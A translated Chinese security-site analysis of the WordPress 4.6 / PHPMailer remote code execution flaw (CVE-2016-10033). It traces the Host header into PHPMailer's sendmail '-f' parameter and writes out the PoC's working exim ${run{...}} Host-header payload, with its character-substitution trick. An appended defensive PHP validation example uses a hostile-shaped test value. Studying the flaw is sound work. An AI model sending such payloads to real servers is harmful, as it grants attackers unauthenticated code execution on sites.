WordPress 4.6 remote code execution vulnerability analysis - vulnerability warning - the Black Bar Safety Net (myhack58)

Source: www.myhack58.com, MYHACK58:62201786015
Author: 佚名 (Anonymous)
Date: May 10, 2017

CVSS3: 9.8 High, CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS2: 7.5 High, AV:N/AC:L/Au:N/C:P/I:P/A:P
EPSS: 0.975 High, percentile 100.0%

The WordPress 4.6 remote code execution vulnerability is a very serious one: an unauthenticated attacker who exploits it obtains remote code execution on the target server immediately, and the application server is ultimately compromised completely. No plugin or non-standard setting is required to exploit it. In his PoC, Dawid Golunski (@dawid_golunski) also shows us a clever trick for substituting the "/" character and the " " (space) character.

0×01 Vulnerability analysis

The whole chain relies on two things: WordPress does not validate the Host field of the request, and PHPMailer versions below 5.2.20 contain a code execution vulnerability. Using these two unsafe points together results in remote code execution.

The PoC used is WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033; the command we tested with was

/usr/bin/touch /tmp/manning.test

Let us look at the request the PoC sends:

![](/Article/UploadPic/2017-5/20175101905266.png?www.myhack58.com)

The Host field is set as follows:

Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}manning.test}} null)

This is nothing like our usual notion of a Host header.

The rest of the process is straightforward.

First, in wp-login.php, the request is routed according to its action parameter:

![](/Article/UploadPic/2017-5/20175101905482.png?www.myhack58.com)

It then enters the retrieve_password function:

![](/Article/UploadPic/2017-5/20175101906228.png?www.myhack58.com)

which in turn calls the wp_mail function, located in pluggable.php:

![](/Article/UploadPic/2017-5/20175101906330.png?www.myhack58.com)

In wp_mail, WordPress splices the $_SERVER['SERVER_NAME'] variable into the from_email variable.

![](/Article/UploadPic/2017-5/20175101907109.png?www.myhack58.com)

After a series of message-content concatenation steps, the member variables of the phpmailer object have been assigned, and Send is called.

![](/Article/UploadPic/2017-5/20175101907540.png?www.myhack58.com)

Here the most critical function, mailSend, stands out: it is responsible for the final call, and the key is the mailPassthru function, which carries the attacker-controlled params variable onward.
```php
protected function mailSend($header, $body)
{
    $toArr = array();
    foreach ($this->to as $toaddr) {
        $toArr[] = $this->addrFormat($toaddr);
    }
    $to = implode(', ', $toArr);
    // $this->Sender comes from the From address, which WordPress built from
    // $_SERVER['SERVER_NAME']; it becomes the sendmail "-f" argument without escaping.
    if (empty($this->Sender)) {
        $params = ' ';
    } else {
        $params = sprintf('-f%s', $this->Sender);
    }
    if ($this->Sender != '' and !ini_get('safe_mode')) {
        $old_from = ini_get('sendmail_from');
        ini_set('sendmail_from', $this->Sender);
    }
    $result = false;
    if ($this->SingleTo && count($toArr) > 1) {
        foreach ($toArr as $toAddr) {
            // $params is handed to the MTA through mailPassthru() for every recipient
            $result = $this->mailPassthru($toAddr, $this->Subject, $body, $header, $params);
            $this->doCallback($result, array($toAddr), $this->cc, $this->bcc, $this->Subject, $body, $this->From);
        }
    } else {
        $result = $this->mailPassthru($to, $this->Subject, $body, $header, $params);
        $this->doCallback($result, $this->to, $this->cc, $this->bcc, $this->Subject, $body, $this->From);
    }
    if (isset($old_from)) {
        ini_set('sendmail_from', $old_from);
    }
    // the article's listing is cut off at this point; the rest of the function is not on this page
}
```
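As an added example (not code from the article, the PoC, WordPress or PHPMailer), the two validation gates a defender would place on the path just traced, written for PHP 7.1 or later: one for the SERVER_NAME value that wp_mail splices into from_email, one for the Sender value that mailSend turns into the "-f" parameter. The helper names and the sample inputs are hypothetical and constructed.

```php
<?php
// Added example (not WordPress's, PHPMailer's or the PoC's code); helper names are hypothetical.
// Gate 1 is for the $_SERVER['SERVER_NAME'] value wp_mail() splices into from_email,
// gate 2 for the Sender value mailSend() turns into the sendmail "-f" parameter.

// Gate 1: accept only a syntactic hostname, optionally followed by a port.
function is_plain_hostname(string $host): bool
{
    $host = preg_replace('/:\d{1,5}$/', '', $host);   // drop an optional ":port"
    if ($host === '' || strlen($host) > 253) {
        return false;
    }
    // dot-separated labels of letters, digits and hyphens; no leading or trailing hyphen
    $label = '(?!-)[A-Za-z0-9-]{1,63}(?<!-)';
    return (bool) preg_match('/^' . $label . '(\.' . $label . ')*$/', $host);
}

// Gate 2: build the "-f" parameter only from an address that cannot carry shell or
// MTA expansion syntax; null tells the caller to refuse to send rather than fall back.
function safe_sendmail_params(string $sender): ?string
{
    if ($sender === '') {
        return ' ';   // the "no envelope sender" value mailSend() itself uses
    }
    if (filter_var($sender, FILTER_VALIDATE_EMAIL) === false) {
        return null;
    }
    // the allowlist is the real gate: no whitespace, braces, '$', quotes, parentheses or slashes
    if (!preg_match('/^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+$/', $sender)) {
        return null;
    }
    // escapeshellarg() only keeps the value a single argv element; it does not replace the allowlist
    return '-f' . escapeshellarg($sender);
}

// Constructed inputs: a normal site name and a value shaped like the article's Host header.
$benign  = 'blog.example.test';
$hostile = 'target(any -froot@localhost -be ${run{CONSTRUCTED}} null)';

var_dump(is_plain_hostname($benign));
var_dump(is_plain_hostname($hostile));
var_dump(safe_sendmail_params('wordpress@' . $benign));
var_dump(safe_sendmail_params('wordpress@' . $hostile));
```

The hostile value fails gate 1 on its parentheses and spaces and gate 2 on the same characters, so the send is refused before any "-f" argument is assembled.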
